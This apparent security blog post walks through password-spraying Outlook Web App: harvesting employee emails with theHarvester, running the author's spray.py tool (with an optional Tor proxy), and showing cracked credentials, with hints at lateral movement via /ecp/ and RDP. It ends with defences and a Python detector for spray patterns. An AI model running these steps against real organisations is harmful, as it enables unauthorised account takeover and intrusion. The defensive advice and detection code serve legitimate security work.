Weak passwords are still a thing. I’ve been worried about this for a while. Weak passwords aren’t new, and we should pay attention to them, since a malicious person can go much further from a single compromised account. In only 5 minutes anybody can get access to a network and move laterally once inside. As a proof of concept I published a simple Python script called OWAspray.py to test the top 10 worst passwords we could possibly find.

First, we’re going to collect some emails using theHarvester. theHarvester is a very simple, yet effective tool designed to be used in the early stages of a penetration test: use it for open source intelligence gathering and to determine a company’s external threat landscape on the internet. Let’s install it:

$ git clone https://github.com/laramies/theHarvester.git
$ cd theHarvester
$ virtualenv -p python3 venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Good. Now, let’s find some info:

$ python theHarvester.py -d DOMAIN -b all -l 200
...
[*] Emails found: X
----------------------
...
FIRSTNAMELASTNAME@DOMAIN
FIRSTNAMELASTNAME@DOMAIN
...
[*] Hosts found: Y
---------------------
...
mail.DOMAIN:IP
...

We’ll see a lot of information, but right now we only want to collect the emails and the URL of the Outlook Web Application. In this case we have the following pattern: FIRSTNAME+LASTNAME@DOMAIN. Cool, now we can go to LinkedIn or their website to get more usernames. The tool linkedin2username looks pretty good for this; you can try it. I will (probably) be writing some script for this later. Now that we have the email pattern, we can write a list of usernames to test.

Let the magic begin…

OWAspray.py

Password spraying refers to the attack method that takes a large number of usernames and loops through them with a single password. These attacks have become one of the favorite techniques of attackers, as they have proved to be very effective for advancing through a network after establishing a foothold inside. I wrote a script to test this; let’s try it:

$ git clone https://github.com/davidtavarez/owaspray
$ cd owaspray
$ virtualenv -p python2.7 venv
$ source venv/bin/activate
$ pip install -r requirements.txt
$ python spray.py --help

usage: spray.py [-h] -t TARGET -u USERNAME_FILE -p PASSWORD_FILE
                [--tor-host TOR_HOST] [--tor-port TOR_PORT]

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URL of the target.
  -u USERNAME_FILE, --username_file USERNAME_FILE
                        The list of users.
  -p PASSWORD_FILE, --password_file PASSWORD_FILE
                        The list of passwords to try.
  --tor-host TOR_HOST   Tor server.
  --tor-port TOR_PORT   Tor port server.

Now we can confirm the URL:

$ curl -L -I https://mail.DOMAIN/
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Location: https://mail.DOMAIN/owa/
...

HTTP/1.1 440 Login Timeout
Content-Length: 43
Content-Type: text/html; charset=utf-8
...
Connection: close
...

Good. Let’s hack this!

$ python spray.py -t https://mail.DOMAIN -u users.txt -p passwords.txt
[+] FIRSTNAMELASTNAME:PASSWORD
[+] FIRSTNAMELASTNAME:PASSWORD
...

:)

The important question is: how far can I go from here? Well, if you got an admin account, you can move to /ecp/ and have fun; also, finding some open RDP would be fine, I guess… what else? I don’t know, use your creativity!

What should we do to protect users?

It’s very simple: use better passwords, do not reuse passwords, enforce Two-Factor Authentication (2FA) and create a max-attempt lockout policy.
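The max-attempt policy above counts failures per account, which is exactly what a spray avoids: one password across many users leaves each account with a single failure. As an added example (not part of this post or the owaspray project), here is a small detector that groups OWA login failures by source address instead, over constructed sample log lines in an assumed simplified "timestamp client_ip username status" format.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in an assumed simplified IIS/OWA-style format
# ("timestamp client_ip username status"); a real deployment would parse the
# actual W3C log fields or Exchange authentication events instead.
SAMPLE_LOG = """\
2019-03-01T10:00:01 203.0.113.5 alice 401
2019-03-01T10:00:02 203.0.113.5 bob 401
2019-03-01T10:00:03 203.0.113.5 carol 401
2019-03-01T10:00:04 203.0.113.5 dave 401
2019-03-01T10:00:05 203.0.113.5 erin 401
2019-03-01T10:00:06 203.0.113.5 frank 200
2019-03-01T10:05:00 198.51.100.9 alice 401
2019-03-01T10:05:30 198.51.100.9 alice 401
2019-03-01T10:06:00 198.51.100.9 alice 200
"""

def parse(line):
    ts, ip, user, status = line.split()
    return datetime.fromisoformat(ts), ip, user.lower(), int(status)

def detect_spray(log_text, min_users=5, window=timedelta(minutes=10)):
    """Return {ip: sorted usernames} for each source IP whose failed logins
    cover at least `min_users` distinct accounts inside `window`.
    A per-account lockout threshold misses this pattern: each user sees
    only one failure, so the spray is only visible when grouped by source."""
    failures = defaultdict(list)  # ip -> [(timestamp, user)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, status = parse(line)
        if status == 401:
            failures[ip].append((ts, user))
    hits = {}
    for ip, events in failures.items():
        events.sort()
        start = 0  # sliding window over this source's failures
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            users = {u for _, u in events[start:end + 1]}
            if len(users) >= min_users:
                hits[ip] = sorted(users)
                break
    return hits

if __name__ == "__main__":
    for ip, users in detect_spray(SAMPLE_LOG).items():
        print(f"possible spray from {ip}: {len(users)} accounts ({', '.join(users)})")
```

Only 203.0.113.5 is flagged: five distinct accounts fail within seconds, while 198.51.100.9 is a single user mistyping a password twice, which is the case a per-account lockout already handles.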